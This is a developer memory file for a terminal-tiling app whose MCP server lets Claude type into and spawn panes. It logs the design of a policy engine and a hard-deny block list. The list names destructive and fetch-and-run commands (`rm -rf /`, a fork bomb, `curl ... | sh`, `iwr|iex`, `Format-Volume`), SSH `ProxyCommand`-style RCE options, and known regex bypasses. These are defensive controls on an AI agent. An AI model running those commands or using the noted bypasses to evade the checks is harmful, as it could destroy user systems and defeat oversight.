tiletopia/memory.md
megaproxy 5b970f8b48 Hard-deny: PowerShell patterns + drift-proof the label list
Four new compiled-in hard-deny rules covering PowerShell + cmd.exe
catastrophic patterns (mirror of the POSIX 10):

- Remove-Item / del / rd / ri / rm / erase / rmdir targeting C:\
  or user home / appdata
- Format-Volume / Clear-Disk with any flag (= an invocation, not a
  Get-Help lookup)
- iwr | iex pipe form (PowerShell web-to-execute)
- iex (irm ...) parenthesized form

Universal application — no shell-aware scoping yet. PS cmdlet
identifiers are distinctive enough that bash false-positives are
vanishingly unlikely. Shell-aware policy scoping remains a known
follow-up.

Drift-proof the "Always blocked" label list: backend now exposes
hard_deny_rules() via a new mcp_hard_deny_labels Tauri command, and
PolicyTab loads it at mount instead of hardcoding the list. Avoids
the 11→15 manual sync that would have been needed (and that had
already drifted twice this week).

cargo test --lib: 138 passed; 0 failed (118 prior + 20 new fuzz
cases for rules 11-14; hard_deny_rules_count bumped 10 → 14).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
2026-05-26 17:14:42 +01:00

62 KiB
Raw Blame History

memory — tiletopia

Durable memory for this project. Read at session start, update before session end. Date format: YYYY-MM-DD.

Decisions & rationale

  • Stack: Tauri 2 + React 18 + TypeScript + Vite + pnpm + xterm.js + portable-pty. Originally Svelte 5; migrated to React in commit 774b863 (released as 0.2.0). Mirrors claude-usage-widget's Windows-targeting toolchain (MSVC + WebView2 + NSIS installer). No new technology bets stacked on top of the new product bet. CLAUDE.md still says Svelte 5 — should be updated when convenient.
  • Layout model: binary tree of splits, NOT free-form rectangles. Same as i3 / tmux / Zellij. Each internal node is HSplit/VSplit + ratio; each leaf is a terminal. Dragging a gutter mutates one parent ratio; both sibling subtrees reflow; descendants get resize. Adaptive resize falls out automatically with no constraint solver. Preset layouts ("3 columns", "2×2") are pre-built trees.
  • PTY backend: portable-pty (same crate WezTerm uses). Spawns wsl.exe -d <distro> --cd <path> on Windows. Manager is a Mutex<HashMap<PaneId, PaneHandle>> in Rust; each pane has a background reader thread that emits pane://{id}/data events.
  • Wire format: base64-encoded byte chunks via Tauri events. xterm.js's onData emits strings; we UTF-8 encode then base64. Slower than a typed-array payload but trivially correct. Revisit if throughput matters.
  • Source on Windows-native disk (D:\dev\tiletopia\), symlinked into WSL. Same pattern as rimlike (D:\godot\rimlike) and tavernkeep. Forced by pnpm 11.x's isDriveExFat crashing on \\wsl.localhost\... UNC paths.
  • Don't commit node_modules, src-tauri/target, or .pnpm-store. DO commit Cargo.lock (binary project, reproducible builds).
  • Session awareness without an in-pane agent. Plan: poll /proc/<pid>/cwd of the shell's child + foreground process every ~2s. Sufficient to detect cd and whether claude is running.
  • State propagation in the layout tree: hybrid mutable + replace. The root tree is $state(...) at App level. Direct mutation (e.g. node.ratio = X during gutter drag) is reactive via Svelte 5's deep proxy. Structural changes (split/close) go through pure helpers in tree.ts that return a new root, which App reassigns. Drag stays fast (no tree walk); structural changes stay simple. {#key leaf.id} around LeafPane ensures swapping a leaf in/out cleanly unmounts XtermPane (which kills the PTY on destroy).
  • Layout persistence: %APPDATA%/com.megaproxy.tiletopia/workspace.json via two Tauri commands (save_workspace, load_workspace). Atomic write (tmp + rename) so a crash mid-save can't leave a partial file. Path comes from Tauri's app.path().app_config_dir() — no separate dirs crate needed. M2's localStorage path is checked once at boot as a one-time migration source, then cleared.
  • Auto-save is debounced 500ms. Every tree mutation kicks the $effect; it resets a timeout and only writes after 500ms of quiet. Cheap enough to never need throttling on UI mutations; matters because each gutter-drag step would otherwise hit disk dozens of times per second.
  • Pane operations bundled into a PaneOps interface in lib/layout/ops.ts. Pane and SplitNode just pass ops through; LeafPane consumes it. Replaces M2's per-callback prop drilling (would have been split + close + setDistro + setLabel + distros = 5 separate props). Easier to grow as M4 adds broadcast / palette ops.
  • Per-pane distro change forces a remount via id swap. changeDistro in tree.ts assigns a new id to the leaf; Pane.svelte's {#key leaf.id} unmounts XtermPane (which kills the old PTY) and mounts a fresh one with the new distro. Same mechanism we already use for split/close.
  • Split inherits parent's distro AND cwd (not label — label is a per-pane name, not a hierarchy thing). So "split right" while in a project keeps both panes in that project.
  • Broadcast input is frontend-routed, not a backend command. Each LeafPane reports its backend PaneId to App via ops.registerPaneId. When a broadcasting pane's XtermPane.onInput fires, App's broadcastFrom walks all other leaves with broadcast === true and calls writeToPane(theirPaneId, b64). No Rust changes needed; the existing per-pane write path does the work N times. Origin pane writes to its own PTY normally — broadcast is purely about mirroring to others.
  • Idle detection lives in LeafPane. Each pane tracks lastDataTime (reset on every XtermPane.onDataReceived) and a setInterval that fires ops.notify after IDLE_THRESHOLD_MS (5000ms) of silence, once per idle cycle. No backend involvement — purely observes the existing PTY data stream. The "is foreground process claude" filter is deferred (would need a Rust-side foreground-process probe); for now every pane notifies after 5s of quiet.
  • In-app toasts (top-right stack), 5s auto-dismiss. Lives in Notifications.svelte; App owns the array + auto-dismiss timer. Not native OS notifications — defer tauri-plugin-notification if/when we want desktop alerts that work when the app is backgrounded.
  • Ctrl+K palette: modal overlay with text filter on label | distro | cwd, arrow-key nav, Enter to focus. Activating a pane sets activeLeafId; LeafPane has a $derived active = ops.activeLeafId === leaf.id and a $effect that bumps a focusTrigger counter when active flips true; XtermPane watches focusTrigger and calls term.focus(). Active pane gets a blue 1px border; broadcasting pane gets orange.

Open questions / TODOs

  • M2 — splits-tree layout component. Two panes side by side, draggable divider, both panes alive. Save/restore layout as JSON. Done 2026-05-22.
  • M3 — workspace persistence + preset layouts + per-pane distro + pane labels. Done 2026-05-22.
  • M4 — orchestration. Broadcast input, idle notifications, Ctrl+K palette. Done 2026-05-22.
  • Auto-save debouncing. 500ms timer in App.svelte $effect.
  • HMR distro picker reset. No longer an issue — per-pane distro selection.
  • Idle detection: filter by "claude is foreground." Currently every pane notifies after 5s silence, which fires too eagerly when the user is reading a claude response. Want to detect that claude (or any user-specified process) is actually running in the pane's shell before notifying. Needs a Rust-side probe over WSL: wsl.exe -d <distro> ps --ppid <shell_pid> -o comm=. Defer to a future polish pass.
  • Native OS notifications. Right now toasts only show while the app is focused. tauri-plugin-notification would push to Windows Action Center; useful for "claude finished" when the app is minimized. Worth adding if/when the user actually backgrounds the app while waiting for sessions.
  • Configurable idle threshold. Hardcoded 5000ms in LeafPane.svelte. Should move into a settings panel; M5 territory.
  • Logic tests for tree.ts. Vitest, 43 cases, runs via pnpm test. Done 2026-05-22.
  • Component-level tests (vitest + jsdom + @testing-library/svelte) — would have caught the M4 active-border reactivity bug. Useful when the Svelte component surface stops being trivial; defer until/unless something else goes sideways.
  • Multi-workspace tabs. Several independent layouts the user can switch between. Saved as workspaces.json with { current: id, list: [{ id, name, tree }] }. Not on the M0M5 critical path; either bolt on after M5 ship or fold into a "tabs" minor milestone.
  • M5 — Ship infrastructure. Custom icon, version bumped to 0.1.0, scripts/release.sh for one-shot tag+upload, README install section. Done 2026-05-22. Next step (user action): run pnpm tauri build on Windows then scripts/release.sh v0.1.0 from WSL to cut the actual release.
  • Native Windows shells (cmd / pwsh)? portable-pty supports them for free; keep the option open. Decide whether to expose in UI at M3.
  • Persistent scrollback across app restarts. Would need an out-of-process mux daemon. Big scope creep; explicitly deferred past v1.
  • Keybinding philosophy. Copy tmux, copy WezTerm, or invent? Decide at M3.
  • Help (?) overlay. Small ? icon in the titlebar, opens a modal listing all keyboard shortcuts (split / close / promote / broadcast / palette / font size / nav) and quick tips on shell-picker dropdown + SSH host manager + saved-password autotype. Same modal style as Palette / HostManager. Source of truth lives in one place — refactor the README shortcuts table to be generated from it (or vice versa) so they can't drift.
  • MCP server: Claude controls tiletopia. Expose a Model Context Protocol server (stdio transport, runs inside the Tauri app or a sidecar) so a Claude session — running anywhere, including inside one of tiletopia's own panes — can drive the workspace. Capabilities to expose as MCP tools / resources:
    • Inspect: list_panes() (id, label, shellKind, distro/host, cwd, active flag), read_pane(id, last_lines?) (scrollback tail), read_layout() (the tree JSON).
    • Drive sessions: write_pane(id, text) (send keys/commands; same path as broadcast), wait_for_idle(id, timeout) for command-completion synchronization.
    • Reshape: spawn_pane(spec, parent_id?, orientation?) (WSL distro / PowerShell / saved SSH host), close_pane(id), apply_preset(name), promote_pane(id), set_label(id, label), swap_panes(id, id).
    • SSH hosts: list_hosts(), add_host(...), connect_host(host_id) → pane_id (spawn + return). Read-only access to hasPassword flag; never expose saved passwords through the MCP surface.
    • Notifications: notify(message) for status updates Claude wants to surface.
    • Authentication: bind to localhost only; consider a per-session token written to the app config dir that the MCP client must present. Treat the MCP socket as trusted only to processes the user explicitly points at it — anyone with access to the user's account could read commands and stream PTY output. Surface this caveat in the help overlay.
    • Tauri integration: Rust-side MCP server using a published crate (or hand-rolled JSON-RPC); reuses the existing PtyManager + hosts.json + workspace state. Frontend gets read-only events when the MCP causes a layout change so the UI reflects it without races. Big — milestone-scale work; needs a design doc before code.
    • Status: v1 (read-only, 2026-05-25) + v2 (write surface, 2026-05-26 across PRs 14) shipped. All 11 originally-planned write tools are live: set_label, close_pane, swap_panes, promote_pane, apply_preset, spawn_pane, connect_host, write_pane, add_host, delete_host. Open polish items live in the per-session-log "follow-ups" sections.

Session log

2026-05-26 — Hard-deny: PowerShell patterns + label list de-duplicated

Mirrors the POSIX hard-deny rules with their Windows/PowerShell equivalents. Four new patterns:

  1. Remove-Item / del / rd / ri / rm / erase / rmdir targeting C:\ / ~ / $HOME / $env:USERPROFILE / $env:APPDATA. Covers the canonical Remove-Item -Recurse -Force C:\ along with bare del C:\ and rd /S /Q ~. PS aliases vary per environment so the alternation is wide.
  2. Format-Volume / Clear-Disk with any flag. Bare cmdlet mentions (e.g. Get-Help Format-Volume) are fine; presence of -DriveLetter / -Number / similar means an actual invocation.
  3. iwr|iex pipe formInvoke-WebRequest/Invoke-RestMethod/iwr/irm/curl.exe piped into Invoke-Expression/iex. The PS web-to-execute primitive. (curl in PS land is an alias for Invoke-WebRequest which doesn't pipe-string into anything bash-like; the actual curl.exe binary does, hence the literal curl\.exe.)
  4. iex (irm ...) parenthesized form. More common than the pipe form in real install one-liners.

Universal application — no shell-aware policy scoping yet. PS cmdlet names (Remove-Item, Format-Volume, iwr, iex) are distinctive enough that a bash session triggering one is virtually impossible. The "scope rules by shellKind of the target pane" work is a known follow-up but doesn't block this.

Label list de-duplicated. PolicyTab.tsx previously hardcoded the 10 POSIX labels. Adding PS rules would have forced updating both sides — and the comment in the new mcp_hard_deny_labels Tauri command notes it had already drifted from the backend twice this week. Now: backend is the SoT, frontend calls mcpHardDenyLabels() at panel mount. "Always blocked" section now renders all 14 labels live from the backend.

Tests: 20 new fuzz cases (Rule 1114), 3-5 positive + 1-2 negative each. hard_deny_rules_count bumped from 10 → 14. 138 passed; 0 failed on Windows.

Notes for next time someone adds a hard-deny pattern:

  • Update only HARD_DENY_PATTERNS and hard_deny_rules_count. The UI list auto-syncs via the Tauri command. README's mention of "10 patterns" is now also drift-prone but lower-stakes.
  • PowerShell cmdlets are identified with - in the middle (Remove-Item). \bRemove-Item\b works because the \b anchors are between word and non-word chars (R/string-start, m/non-word-after) — the - in the middle is fine.
  • Common PS quoting forms not yet caught (filed as follow-up if it bites): single-quoted paths (Remove-Item -Recurse -Force 'C:\') and trailing flags after the path (Remove-Item -Recurse -Force C:\ -Confirm:$false). The regex anchor requires path → whitespace → end/operator/comment; flag-after-path doesn't fit. Common attacker copy-paste forms put the path last, so this is real-world-fine.

Open follow-ups specific to this session:

  • Shell-aware policy scoping. Today PS rules apply universally (low false-positive risk but architecturally fuzzy). Per-leaf-shellKind discrimination would let users Allow write_pane(*) on bash while still gating PS. Memory'd long-standing follow-up.
  • README drift. README's "10 hard-deny patterns" mention is stale. Either remove the count or rewrite to enumerate via a build-time script. Low priority.

2026-05-26 — Hard-deny rework: fix latent enforcement gaps surfaced by PR-4

Re-enabling the policy test module in PR-4 (the policy_with compile fix) exposed 16 pre-existing test failures. Triaged: 2 wrong assertions, 14 real bugs. Fixed all in one focused pass on mcp_policy.rs.

Two-pass is_hard_denied. The subcommand splitter (split on && || ; | |& & \n) was destroying patterns whose meaning requires them to span operators — fork bomb (:|:&) and curl-piped-to-shell (curl ... | bash) being the obvious examples. Result: 9 of the 10 advertised hard-deny rules quietly didn't enforce against the patterns the UI listed. New shape:

  1. Whole-input pass first — every regex tried against the un-split command. Wins fork bomb, curl|bash, anything else that needs its |/& to match.
  2. Per-subcommand pass second — preserves the original behaviour of catching safe_cmd && rm -rf / after splitting. Order matters; the whole-input check is fast (compiled regex, small inputs in practice), and a whole-input hit short-circuits before splitting.

This is the load-bearing fix. The regex tweaks below are individually small but each closes a specific bypass.

Regex fixes:

  • Rule 1/2 flag class: [a-z]*r[a-z]*f?[a-zA-Z]*[rR][a-zA-Z]*f?. Catches rm -Rf / (uppercase R), which previously slipped through. Same change applied to rule 2 (rm -rf ~ / $HOME).
  • Rule 1/2 trailing anchor: ($|[;&|])($|[#;&|]). rm -rf / # cleanup now triggers; previously the # confused the anchor and the regex bailed.
  • Rule 8 shell alternation: (ba?sh|zsh)(ba?sh|zsh|sh). The leading b in ba?sh was mandatory, so curl evil | sh (the most common form of these install scripts) was not caught. Adding sh to the alternation catches the bare POSIX shell. Verified order-dependency: at the position after \s*(sudo\s+)?, the engine tries ba?sh first, then zsh, then sh; nothing in dash/ash/whatever starts with s then h at the right offset, so no over-match.
  • Rule 9 anchor: \bchmod\s+-R\s+777\s+/\bchmod\s+-R\s+777\s+/(\s|$|[#;&|]). The old regex matched any / (including /tmp); the new one requires the / to be followed by a path boundary, end of input, or a shell operator. chmod -R 777 /tmp now correctly does NOT trip the rule (the desired behaviour — destructive but a deliberate user choice, not "destroy the system").

Two test assertions flipped from Some to None (hard_deny_quoted_pattern_not_matched, hard_deny_git_grep_contains_pattern). The originals expected false-positives on echo "rm -rf /" and git log --grep="rm -rf". The post-fix behaviour (NOT flagging these) is correct: searching for or printing a danger string is not the same as invoking it, and false-positives here would make a lot of claude advice unusable. The tests now document this with a comment.

Result: 118 passed; 0 failed. All my new sanitiser tests (PR-4) + all the previously-broken hard-deny tests + the 70+ that were already passing.

Things to verify next time someone touches hard-deny:

  • If a new rule's pattern is intrinsically multi-operator (think kill -9 -1, dd | gzip > device), make sure whole-input matching covers it — don't rely on the subcommand pass.
  • If a new rule's pattern targets a path, anchor with \s|$|[#;&|] after the trailing / (rule 9 style) to avoid over-matching /tmp etc.
  • Flag character classes for case-insensitive Unix tools: [a-zA-Z], not [a-z].
  • Trailing-comment anchor: include # in the post-pattern character class.

Open follow-ups specific to this session:

  • Multi-pipe-to-shell like curl url | grep -v foo | bash is still not caught — [^|]*\| only spans one pipe. Probably fine for v2; if it bites, broaden to [^|]*(\|[^|]*)*\|\s*... or add a second-pass that detects "any output of curl/wget reaches a shell anywhere downstream".
  • PowerShell hard-deny patterns (carried over from PR-3/PR-4 lists). The 10 baked-in rules remain POSIX-only.
  • Audit-log persistence (carried over).

2026-05-26 — MCP v2 PR-4: add_host + delete_host + extraArgs sanitiser + third SSH safeguard

Final v2 PR. All 11 planned MCP write tools now live. Mechanically the same dispatcher shape as the other tree-shape tools; the novel bits are the extraArgs sanitiser and the third SSH-safeguard switch.

Sanitiser (hosts::sanitize_extra_args). Rejects four -o KEY=... keys that are local-RCE primitives at ssh-invocation time, before the connection is even attempted:

  1. ProxyCommand=… — runs a shell command on connect.
  2. LocalCommand=… — runs a shell command on connect (when PermitLocalCommand=yes).
  3. KnownHostsCommand=… — runs a shell command at handshake (CVE-2023-51385 class).
  4. PermitLocalCommand=yes — unlocks LocalCommand even if not set in this snippet. (=no and unset are fine.)

Recognises both two-arg form (-o KEY=VAL) and joined form (-oKEY=VAL), case-insensitive on the key, equals-or-space between key and value. Returns Err(reason) with the offending arg + a human-readable why. 19 fuzz tests cover positive + lookalike-negative cases (e.g. -o ServerAliveInterval=30 passes; -o proxycommand=evil fails; bad arg in the middle of a long list fails). Only the MCP add_host path runs this — manual host management via the titlebar 🔑 picker stays unrestricted, matching the "user has full agency" stance.

Third SSH safeguard: allowAddHost (default off). Gates both add_host and delete_host with the same add-host-disabled server-side error pattern as the existing allowOpenSsh gate. Bundled both tools under one switch for simplicity — delete_host is destructive but it's the natural symmetric companion to add_host. UI is a third checkbox in the SSH safeguards section; unlike autoAllowSpawnedSsh, this one isn't disabled-when-X (you can let Claude manage hosts without letting it open them, or vice versa).

Both tools are thin dispatcher wrappers, following the PR-2/PR-3 pattern exactly: arg struct → safeguard gate → in-process validation → dispatch_action with stable args_repr → frontend runMcpHandler case + buildConfirmInfo case. add_host runs pty::validate_ssh_token on hostname/user/jumpHost (made pub for cross-module use; same logic ssh-spawn would do anyway, just rejected earlier with a clearer error) plus the sanitiser on extraArgs. delete_host looks the host up in state.mirror.hosts so Claude can't probe arbitrary ids, and relies on save_ssh_hosts' existing orphan-credential sweep to clean up the keyring entry.

Backend host_id is generated frontend-side in the handler (via the same newId() helper HostManager uses → crypto.randomUUID() shape). Backend doesn't pre-generate one because the dispatcher contract is "MCP call → emit request → frontend mutates + resolves" — generating the id on whichever side actually performs the mutation keeps responsibility clean.

Pre-existing bug fixed as a prerequisite: mcp_policy.rs's policy_with test helper was constructing McpPolicy without the ssh_safeguards field (added in PR-3.5). That made the entire tests mod fail to compile, silently breaking all 30+ policy unit tests since 2026-05-26 morning. Added ssh_safeguards: SshSafeguards::default() as one-liner; tests should compile again.

Module headers + with_instructions updated to call out the new 11-tool surface, add_host's extraArgs sanitiser, and the add-host-disabled error string Claude needs to recognise. Always keep these in sync when adding tools — Claude reads with_instructions for routing decisions.

Open follow-ups specific to this session:

  • Verify on Windows. PR-4 was authored in WSL; pnpm check is clean but Rust build/tests live on the Windows host. User to cd D:\dev\tiletopia && cargo test -p tiletopia_lib (or the equivalent) before merging, especially to confirm the 19 new sanitiser tests + the policy_with fix.
  • End-to-end test with Claude. Suggested smoke: toggle the new allowAddHost switch on; ask Claude to add_host with hostname example.com, then connect_host to it (which still needs allowOpenSsh), then delete_host. With all three switches off, add_host should refuse cleanly with add-host-disabled.
  • Race in concurrent add_host calls. Frontend reads hosts from the closure, builds next = [...hosts, newHost], calls setHosts(next) (non-functional updater). If Claude burst-fires two add_host calls and the second runs before React commits the first, the second's next drops the first. Pre-existing pattern (saveHosts in App.tsx:466 does the same), and in practice the confirm-modal queue serialises calls — but Always allow add_host users would race. Convert to setHosts(prev => …) + extract the saved snapshot if it ever bites.
  • Sanitiser scope expansions to consider: -F <path> lets the user point ssh at a custom config file that could contain ProxyCommand. Currently allowed. Tightening this means rejecting any caller-controlled config file. Out of scope for v2 — add_host doesn't expose a flag for it, and saved hosts are user-edited.
  • PowerShell hard-deny patterns still POSIX-only (carried over from PR-3 list).
  • Per-leaf-shellKind policy scoping still wanted (carried over).
  • CLAUDE.md still says Svelte 5 (still not fixed; called out in 4 session logs now).

2026-05-26 — MCP v2 PR-3 + PR-3.5: powerful writes + SSH safeguards + host-manager Connect button

Commits bf2810a (PR-3 + PR-3.5) and 6da7523 (polish bundle). 8 of 9 planned v2 tools are now live — only add_host (PR-4) remains.

PR-3 added the three highest-power tools: write_pane, spawn_pane, connect_host.

  • write_pane sends keystrokes to a pane's PTY. args_repr is the decoded text itself (not a summary) so the hard-deny matcher and user-policy globs evaluate against the exact bytes Claude wants to send. Per-pane token bucket rate limiter: 30 calls capacity + 3/s refill, sized so a sustained loop trips it within ~2s while normal use never hits it. Rate-limited calls don't emit audit rows (would just spam during an attack); they get a tracing::warn!. Frontend truncateForSummary caps text shown in the modal + audit row to ~60 chars and escapes control chars, so a pasted token doesn't echo verbatim into the UI.
  • spawn_pane + connect_host required a new architectural piece: a spawn-completion oneshot chain in App.tsx. Backend MCP tools that mutate the tree can't reply until the new pane has been registered with a PaneId — and that only happens after React mounts XtermPane and the Tauri spawn_pane command returns. New pendingPaneRegistrations Map<NodeId, resolve_fn>; registerPaneId fires waiters; waitForPaneRegistration(leafId, timeoutMs) returns a Promise the handler awaits. 15s timeout for WSL (covers cold distro start), 30s for SSH (covers handshake + auth), 60s outer cap in dispatch_action as a fail-safe.
  • New tree helper splitLeafWith(root, parentId, orient, leaf) — like splitLeaf but takes a caller-built LeafNode with a pre-generated id instead of minting one inside. The handler needs the id up front so it can register a waiter for it before setTree commits.
  • SSH-extra confirm modalMcpConfirmSpec carries an optional ssh: {hostLabel} context; when set, the modal renders a red warning banner explaining that pattern matching only sees the bytes we send (the remote shell expands aliases/subshells before executing) and the hard-deny still applies but this is best-effort. Detection lives in buildConfirmInfo (renamed from buildConfirmSummary).

PR-3.5 — SSH safeguards. Two new switches on McpPolicy.sshSafeguards, both default off (safest):

  • allowOpenSsh — when off, connect_host and spawn_pane(kind=ssh) refuse server-side with a clear ssh-disabled: message pointing at the Policy tab. User opens SSH manually via the titlebar 🔑 picker.
  • autoAllowSpawnedSsh — when off, SSH panes Claude spawns start with mcpAllow=false. User must explicitly toggle 🤖 before Claude can read scrollback or write keystrokes. UI disables the second checkbox when the first is off (visual "this depends on that").

Together: fresh install + safeguards = Claude has no ability to autonomously touch SSH. Power-user can flip switches independently for graduated trust.

Polish bundle (6da7523) — three small follow-ups from PR-3 testing:

  1. Removed SSH variant from mcp::spawn_pane's schema entirely. New McpSpawnSpec enum (Wsl | Powershell only), used only by SpawnPaneArgs. Internal pty::SpawnSpec keeps all three for the existing frontend-driven spawn path. Reason: spawn_pane(kind=ssh) was a half-broken path — required host as a mandatory field even when hostId was given, so serde rejected the natural "spawn to a saved host" shape. Claude now sees two clearly-scoped tools and routes "open a pane to testbox" to connect_host automatically (verified via natural-language test).
  2. Refreshed with_instructions + module header comment. Both still claimed "read-only v1" long after the write surface landed; Claude was refusing tools on first contact citing the stale instructions. New text describes the actual surface, points at connect_host for SSH, mentions the policy/safeguards gates.
  3. Connect button in the SSH hosts manager. The dialog previously had only Edit — users (rightly) expected clicking a saved host to spawn an SSH pane. Green button next to Edit, wrapped in a flex container so the row's space-between layout keeps both actions right-aligned. Closes the manager on click and splits off the active pane with smart-orient.

Four integration bugs + recurring patterns worth remembering:

  1. Tauri 2 AppHandle::emit moved onto the tauri::Emitter trait — needs use tauri::Emitter;. The error message tells you (well, with --explain), but it's an easy stumbling block.
  2. McpError constructors take impl Into<Cow<'static, str>>. Pass owned String from format!(...), not &format!(...) — the temporary is dropped before the 'static lifetime can be satisfied.
  3. React 18 StrictMode race with listen() inside useEffect. Always use the cancelled-flag pattern; never just let un; .then(fn => un = fn) because the cleanup runs before the Promise resolves on the pretend-unmount.
  4. Serde rename mismatch between Rust and TS. Rust pub ssh_safeguards serializes as ssh_safeguards unless the struct has #[serde(rename_all = "camelCase")]. The frontend reading policy.sshSafeguards got undefined, threw during render, blanked the whole app. Add rename_all on every struct that crosses the IPC boundary.

New defensive primitive: ErrorBoundary.tsx. Wraps the App root + each MCP panel tab. A render exception anywhere shows a small red error card with the message + a "Try again" button instead of unmounting the entire React tree and showing a black window. Caught bug #4 above. Wrap any future high-risk component too (especially anything reading from MCP state).

5 of 9 v2 tools verified end-to-end with Claude: set_label, write_pane, spawn_pane (local), connect_host, close_pane (regression). The hard-deny + rate-limit + audit + confirm + Always-Allow flow all working.

Open follow-ups specific to this session, ordered by priority:

  • PR-4: add_host + extraArgs sanitiser. Lets Claude register new SSH hosts in hosts.json. Sanitiser must reject ProxyCommand, LocalCommand, KnownHostsCommand, PermitLocalCommand=yes, and any -o keys that take a shell command — those are local-RCE-at-ssh-invocation primitives (CVE-2023-51385 class). Probably also bundle delete_host for symmetry. Consider a third SSH safeguard switch ("Allow Claude to save new SSH hosts", default off) to gate the new tool the same way allowOpenSsh gates connect_host. ~3-4 hours total.
  • v2.1 — wire the PolicyClassifier hook. Currently scaffolded as NoopClassifier; calls falling through to Ask could optionally be upgraded to Allow by a small LLM (Haiku via Anthropic API is the cheapest path; Ollama for local). Trade-offs: API key surface in settings, latency on Ask calls, predictability vs. fewer prompts. Defer until the prompt fatigue actually starts biting in daily use.
  • PowerShell hard-deny patterns. Currently the 10 baked-in patterns are POSIX-only (rm -rf /, mkfs, etc.). PowerShell equivalents (Remove-Item -Recurse -Force C:\, Format-Volume, etc.) deserve the same circuit-breaker. Add when users actually run write_pane against PowerShell panes in anger.
  • Per-leaf-shellKind policy scoping. Today write_pane(*) in the Allow bucket allows ALL write_pane calls, including SSH ones — which bypasses the SSH-extra warning modal. Want something like write_pane(local) and write_pane(ssh) discriminators so users can silent-allow locally while still asking on SSH. Schema design needed: extend the glob matcher with shellKind predicates, or just hard-code that the bare-tool-name allow rule never applies to SSH targets. Probably the latter for simplicity.
  • .mcpb bundle for one-click Claude Desktop install — would package the mcp-remote shim invocation + bearer placeholder. Same scope it was in earlier sessions.
  • Audit-log persistence. Currently ephemeral ring of 200. A mcp-audit.jsonl append-only file in app data dir would let users see "what did Claude do overnight." Trade-off: secrets-in-summaries risk if write_pane text leaks past the 80-char truncation. Defer until requested.
  • Confirm-modal queue UX. FIFO single-modal-at-a-time today. If Claude burst-fires many tool calls, the user serially clicks through them. Adding a "reject all pending" button is cheap if it ever annoys.
  • Module-level header in mcp.rs still calls out the 9-tool list — keep this in sync if you add or rename tools. The MCP with_instructions text and the tool descriptions also need attention every time the surface changes (Claude reads both for routing decisions).

2026-05-26 — MCP v2 PR-2: tree-shape writes (close, swap, promote, apply_preset)

Commit e0ce223. Four more tools wired through the existing PR-1b dispatcher pipeline (dispatch_action → policy check → confirm modal → audit), all touching the layout tree but not PTYs or spawn. Mechanically the same shape as set_label: define args struct on backend, validate via require_visible_leaf (factored out — 5 tools now use it), dispatch with stable args_repr, frontend runMcpHandler case applies the mutation via the same setters the UI uses.

apply_preset's data-loss path is non-interactive. If applying the preset would drop panes and the caller didn't pass allow_drops: true, the frontend handler throws with a descriptive message listing the labels of the panes that would be killed. Claude sees the error, decides whether to retry with allow_drops: true. Avoids ambushing the user with a destructive confirm modal — the user already approved the high-level "reshape" action; the per-pane consequences are surfaced to Claude, not them. The audit log shows the failed call so the user still sees what was attempted.

PresetName is a typed enum (single | two_columns | three_columns | two_rows | two_by_two) with serde(rename_all = "snake_case") so Claude's tool schema gets autocomplete and the JSON wire form matches apply_preset(two_columns) style policy rules.

promote_pane errors gracefully when the parent shares orientation with the grandparent — same "no perpendicular split above it" condition the Ctrl+Shift+P keyboard shortcut already toasts. Reuses the existing promoteLeaf(tree, id) === null check.

5 of 9 planned v2 tools live now. PR-3 is the materially harder one (spawn_pane / write_pane / connect_host + rate limiter + SSH-specific confirm treatment); PR-4 is add_host + extraArgs sanitiser.

2026-05-26 — MCP v2 PR-1 + PR-1b: policy engine, audit log, dispatcher, set_label end-to-end

First two of four planned PRs for the MCP write surface. Shipped via fan-out (3 Sonnet agents in parallel + 1 Haiku for fuzz tests, then sequential integration by me). Two clean commits: 464c576 (PR-1 foundation) and 26ffe88 (PR-1b dispatcher + bug fixes).

Architecture: Pattern A (event/reply RPC across the IPC boundary). Frontend keeps tree authority (it's useState in App.tsx); backend MCP tool handlers can't synchronously call into JS. Tauri 2's invoke is JS→Rust only, so a backend-initiated mutation has to round-trip through events:

[MCP tool handler]                    [App.tsx]
  build {requestId, tool, args, ...}   ⟶ emit "mcp://request"
  register oneshot in PendingActions    frontend dispatcher:
  await rx with 30s timeout               1. policy check decided needsConfirm
                                          2. if needsConfirm → modal queue
                                          3. runMcpHandler mutates tree
                                          4. invoke("mcp_action_reply", {id, result})
                                       ⟵ oneshot resolves
  emit "mcp://audit" with outcome
  return to MCP client

TileService now holds an AppHandle and an Arc<PendingActions> (oneshot registry keyed by uuid-shaped id). The dispatch helper centralises policy → emit → await → audit emission for every write tool.

Policy engine (src-tauri/src/mcp_policy.rs, 1152 lines). Three-tier allow / ask / deny, deny-first precedence mirroring Claude Code's .claude/settings.json shape — users already know this DSL. Glob matcher (* only, not regex) with shell-operator-aware subcommand splitting on &&, ||, ;, |, |&, &, newline — a deny rule fires if ANY subcommand matches (defeats safe-cmd && rm -rf /).

Hard-deny list — compiled-in, non-overridable, visible-only-in-UI. Ten regex patterns the user CANNOT disable, applied to write_pane shell content:

  1. rm -rf / (and option-order variants like -Rf)
  2. rm -rf ~ / rm -rf $HOME
  3. rm -rf /*
  4. :(){ :|:& };: (fork bomb)
  5. mkfs.<fs> /dev/...
  6. dd ... of=/dev/(sd|nvme|hd|disk)...
  7. > /etc/(passwd|shadow|sudoers)
  8. curl|wget ... | (sudo )?(ba?sh|zsh) (pipe to shell from network)
  9. chmod -R 777 /
  10. find / ... -delete

Caveats deliberately disclosed in the UI: best-effort accident prevention only (\rm, ${SHELL} -c, aliases all bypass); POSIX-only in v2 (PowerShell equivalents deferred to v2.1); evaluated on the bytes sent in one write_pane, not after the remote shell composes them. Not a sandbox.

73 fuzz tests for the matcher (positive variations + lookalike negatives like rm -rf /tmp/foo, dd of=backup.img, chmod 777 /tmp/file). The shape-of-rule test grid is in mod hard_deny_fuzz at the bottom of mcp_policy.rs.

Audit log surface. Backend emits mcp://audit after every tool call resolves with {tsMs, tool, argsSummary (truncated 80), result: ok|denied|failed, durationMs}. Ring buffer of 200 entries. Args summary explicitly capped — write_pane text would otherwise turn the panel into a secret-leak surface if Claude pastes a token.

McpPanel refactored into three tabs: Config / Audit / Policy. Config kept the existing snippet/regen UI. Audit is a presentational table with chip-coloured rows. Policy is three vertically-stacked allow/ask/deny buckets with add/remove + a Save button, plus a read-only "Always blocked (built-in)" section showing the 10 hard-deny labels with "Cannot be disabled" badges.

